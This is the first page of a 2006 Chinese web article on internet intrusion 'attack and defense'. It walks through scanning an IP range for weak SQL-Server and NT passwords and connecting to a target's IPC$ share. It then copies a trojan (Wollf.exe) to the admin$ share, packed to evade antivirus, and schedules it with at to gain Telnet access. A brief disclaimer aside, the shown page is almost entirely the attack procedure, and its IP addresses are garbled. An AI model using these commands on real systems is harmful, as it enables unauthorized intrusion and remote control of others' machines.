WEB开发网
开发学院网络安全黑客技术 互联网入侵攻防实战 阅读

互联网入侵攻防实战

 2006-11-06 20:00:27 来源:WEB开发网   
核心提示:在第13期我们谈了局域网中入侵服务器的方式以及防范对策,这次笔者想根据自己的经验谈谈互联网对本地服务器的入侵,互联网入侵攻防实战,常见的互联网入侵无非有以下几种:1.IPC入侵;2.利用系统的安全漏洞溢出管理员进行入侵;3.DDoS攻击,也叫分布式拒绝服务,那我们就用at命令来启动它,输入at \61.139..100

在第13期我们谈了局域网中入侵服务器的方式以及防范对策,这次笔者想根据自己的经验谈谈互联网对本地服务器的入侵。常见的互联网入侵无非有以下几种:1.IPC入侵;2.利用系统的安全漏洞溢出管理员进行入侵;3.DDoS攻击,也叫分布式拒绝服务。如果你的系统遇到了三种情况之一,而且被扫描软件扫描到,那就很危险了。为了便于大家更好地理解,笔者就在模拟环境中举例讲解,请大家一定不要按照此方法入侵别人的服务器。

几种入侵方式

首先请安装Win2000系统,然后打开扫描软件X-Scan2.3,再点击“设置/扫描参数”,在出现的对话框中添入一段IP地址,如61.139..1—61.139.2.255,然后点击确定。继续点击“设置→扫描模块”,勾选SQL-Server弱口令、NT-Server弱口令,点击确定,再点击“开始扫描”。一会儿后,X-Scan就已经扫描完了,看看结果,有几十台电脑符合我们的要求。任意点击一IP地址如61.139..100,打开追捕,查看了一下该IP的具体位置以及用户名,做到心中有数,并查看一下该IP所开的端口以及所提供的服务,相关的步骤都可用X-Scan实现。收集完所有需要的信息后,就可以开始入侵了。

打开一个cmd窗口,输入net use \61.139.(.100ipc$ '密码' /user)'用户名',回车,如果出现命令成功完成,那我们的电脑就和对方建立了IPC连接,再次在cmd中输入copy chackwollf.exe \61.139..100admin$,回车,这时我们就将木马程序Wollf.exe拷贝到了对方的系统目录下,不过最好先加一下壳(这样不容易被病毒防火墙查杀)。下一步就是启动这个黑客程序WinNT上面有Schedule(定时服务,可利用它来启动这个程序。首先看一下对方此时的时间以便决定何时启动。输入命令net time \61.139..100,查看到对方的本地时间为23∶11,那我们就用at命令来启动它。输入at \61.139..100 23∶13 Wollf.exe等待几分钟,我们就可以Telnet上去了。

1 2 3  下一页

Tags:互联网 入侵 攻防

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接